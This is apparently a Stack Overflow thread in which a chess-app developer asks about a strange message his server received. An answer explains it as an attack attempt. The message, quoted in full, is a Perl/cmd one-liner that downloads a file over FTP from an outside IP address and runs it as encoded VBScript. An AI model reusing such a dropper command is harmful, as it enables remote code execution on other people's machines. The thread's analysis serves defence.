# I received in my server a message that could be from a hacker

Tags: android, perl, cmd, server

I have a Chess App Online made in Android.

I monitor all messages the server receives after the client has called `.accept()` and I read the `BufferedReader()`.

I recently got a very strange message from an unknown user, which doesn't match at all with the usual message format that I get.

This was what the server received:

```
?2                  28 \perl.exe  -esystem('cmd.exe /c echo bin>f&echo get azb.zip %temp%\\z.zip>>f&echo bye>>f&ftp -A -s:f 112.213.127.52 &cscript.exe /b /e:VBScript.Encode %temp%\\z.zip 579562847 macu://58.238.143.25:88/h')
```

Does anyone have any idea of what is this? And if is dangerous, what can I do?

Comment: I'm voting to close this question as off-topic because it's **not a programming issue**

Comment: It's a nice question, but @Bob is right. What would be appropriate? [su], [sf], [webmasters.se]? Can we move it?

Comment: Bob maybe this problem could happen to other programmers in the future. The answer of pearl is very useful for any people with this problem. I am sure that I am not the unique

Comment: It's not  a bad question. But it simply **doesn't belong to here**.

Comment: Not sure how I feel about this particular question (the code is pretty short, after all), but see [How to handle "What does this (malicious) obfuscated code do?" questions](http://meta.stackoverflow.com/questions/321709/how-to-handle-what-does-this-malicious-obfuscated-code-do-questions) on Meta.

Comment: @AndrésFg: There are many questions, such as *what can I do if I run out of petrol in the middle of the Nevada desert*, that may apply to other programmers. But that doesn't belong here either. Stack Overflow is about *specfic problems* with getting a program to work. I think it belongs on *Super User*. That site is for questions *"about computer software, and not about programming and software development"*, amongst other things

Comment: @PerlDog: You need 3,000+ reputation, and you just vote to close the question, giving the reason that it "belongs on another site".

Comment: @PerlDog: [*What is migration and how does it work?*](http://meta.stackexchange.com/questions/10249/what-is-migration-and-how-does-it-work) explains it well

Answer (score 12):

Indeed this seems like an attack (or an attempt). If I split the line up, I end with the following:

The "individual" tries to execute some code on your server. It first creates a file called `f` with the following content:

```
bin
get azb.zip %temp%\z.zip
bye
```

Then it runs the `ftp` command with that file as input, i.e. it connects to 112.213.127.52 and fetches the file `azb.zip` and stores it locally (on your server) as `%temp%\z.zip`

Finally it runs

```
cscript.exe /b /e:VBScript.Encode %temp%\z.zip 579562847 macu://58.238.143.25:88/h
```

The whole snippet is wrapped into a `perl` one-liner. Perl's `system()` function simply executes the external command given to it, in this case the `cmd.exe`. I think it's done because it is very unlikely that your server will run `cmd.exe` but it *may* run `perl` because `perl` is frequently used for server scripts (e.g. cgi scripts).

Good news is: This will work only if all of the following conditions are met:

- Your server must have `perl.exe` installed
- it must have `cmd.exe` installed
- it must have `cscript.exe` installed
- it must interpret `%temp%` correctly
- most important: your server and your server-side application must be configured to execute arbitrary code that was given via a GET request, which isn't very likely.

[This site](https://www.iplocation.net/) says the address 58.238.143.25 is from South Korea and 112.213.127.52 is from Hong Kong.

I wouldn't care. This is an attack for Windows based servers. Is yours?